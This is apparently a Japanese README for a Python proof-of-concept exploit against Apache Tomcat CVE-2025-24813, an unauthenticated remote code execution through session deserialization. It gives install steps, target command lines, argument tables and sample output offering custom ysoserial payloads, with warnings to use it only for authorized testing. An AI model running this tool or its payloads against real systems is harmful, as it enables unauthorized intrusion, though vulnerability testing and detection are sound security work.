
CVE-2025-24813 用の Python 製概念実証(PoC)エクスプロイト - 悪意のある Java オブジェクトのデシリアライゼーションを介した Apache Tomcat(v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2)における認証不要のリモートコード実行(RCE)。安全な検出モードとカスタムペイロードのサポートを備えています。
Apache Tomcat のデシリアライゼーション脆弱性 (CVE-2025-24813) に対する概念実証エクスプロイトです。このツールは、攻撃者が Tomcat のセッション管理における安全でないデシリアライゼーションを悪用する方法を示します。
警告: このツールは、許可されたセキュリティテストおよび教育目的のみに使用してください。所有していないシステムに対する不正使用は違法です。
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
基本的な使用法:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
高度なオプション:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| 引数 | 説明 | 必須 |
|---|---|---|
-t, --target | ターゲットIPアドレス | はい |
-p, --port | ターゲットポート番号 | はい |
--protocol | http または https(デフォルト: http) | いいえ |
--no-verify | SSL証明書の検証を無効化 | いいえ |
--timeout | リクエストのタイムアウト(秒)(デフォルト: 10) | いいえ |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
脆弱なシステムの一括スキャン用:
🔍 CVE-2025-24813-Scanner - 脆弱な Tomcat ホスト向けの一括検出ツール
この脆弱性の影響を受けている場合:
このソフトウェアは MIT ライセンスの下で提供されます。作者はこのツールの誤用について一切責任を負いません。システムをテストする前に必ず適切な許可を取得してください。
MIT ライセンス - 詳細は LICENSE ファイルを参照してください。